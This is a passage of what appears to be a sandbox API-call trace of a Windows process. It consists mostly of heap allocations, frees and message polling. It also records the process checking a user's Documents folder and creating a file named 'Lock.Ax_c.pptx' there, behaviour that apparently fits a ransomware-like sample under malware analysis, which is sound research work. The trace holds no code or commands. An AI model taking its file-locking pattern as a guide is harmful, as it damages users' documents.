wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0215.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0215.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0215.271] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0215.271] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0215.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0215.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0215.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0215.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0215.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0215.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0215.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0215.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0215.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0215.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0215.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0215.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0215.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0215.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0215.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0215.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0215.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0215.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0215.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854308 [0215.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0215.272] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents/" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0215.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854308 | out: hHeap=0x2af0000) returned 1 [0215.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0215.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0215.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a7a130 [0215.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0215.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0215.275] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/Lock.Ax_c.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\lock.ax_c.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x504 [0215.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f20 [0215.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0215.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0215.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0215.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0215.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0215.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0215.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0215.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0215.277] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0215.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0215.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0215.277] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0215.277] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0215.277] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0215.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0215.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0215.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0215.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0215.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0215.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0215.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0215.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0215.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0215.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0215.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0215.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0215.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0215.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0215.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0215.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f00 [0215.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0215.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0215.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0215.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0215.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0215.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0215.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0215.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0215.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f00 | out: hHeap=0x2af0000) returned 1 [0215.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0215.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0215.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0215.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0215.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0215.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x50e5020 [0215.282] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0215.282] ReadFile (in: hFile=0x510, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0x632a, lpOverlapped=0x0) returned 1 [0215.285] ReadFile (in: hFile=0x510, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0215.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0215.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0215.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0215.285] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0215.285] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x632a) returned 0x2a8a138 [0215.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50e5020 | out: hHeap=0x2af0000) returned 1 [0215.289] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0215.289] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0215.289] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0215.289] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0215.289] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0215.289] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0215.289] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0215.289] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0215.289] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x632a) returned 0x2a90470 [0215.290] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a8a138 | out: hHeap=0x2af0000) returned 1 [0215.290] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0215.290] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.290] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0215.290] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0215.290] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0215.290] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0215.290] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0215.290] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x632a) returned 0x2a8a138 [0215.290] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0215.290] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a8a138 | out: hHeap=0x2af0000) returned 1 [0215.290] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0215.290] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0215.290] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0215.290] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0215.290] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.290] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0215.290] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0215.291] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7140 [0215.291] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0215.291] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0215.291] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0215.291] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0215.291] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.291] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0215.291] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0215.291] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0215.291] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0215.291] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0215.291] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0215.291] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0215.291] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72348 [0215.291] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0215.291] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0215.291] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0215.291] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0215.291] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x632a) returned 0x2a8a138 [0215.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0215.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722f8 [0215.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0215.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0215.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0215.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72268 [0215.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0215.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0215.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0215.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721f8 [0215.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0215.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0215.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0215.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaae88 [0215.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0215.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0215.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0215.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0215.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0215.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0215.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0215.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x632a) returned 0x2a967a8 [0215.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0215.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0215.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0215.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0215.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0215.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0215.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0215.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0215.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0215.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0215.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0215.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0215.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0215.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0215.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0215.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0215.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0215.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0215.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0215.294] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0215.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72548 [0215.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0215.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0215.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72558 [0215.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0215.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0215.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0215.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0215.295] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0215.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0215.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0215.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0215.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0215.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0215.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0215.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0215.295] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0215.295] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0215.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0215.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0215.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0215.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0215.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0215.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0215.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0215.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0215.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0215.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0215.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0215.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0215.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0215.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0215.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0215.296] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0215.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0215.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0215.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0215.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0215.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0215.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0215.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0215.296] RtlAllocateHeap 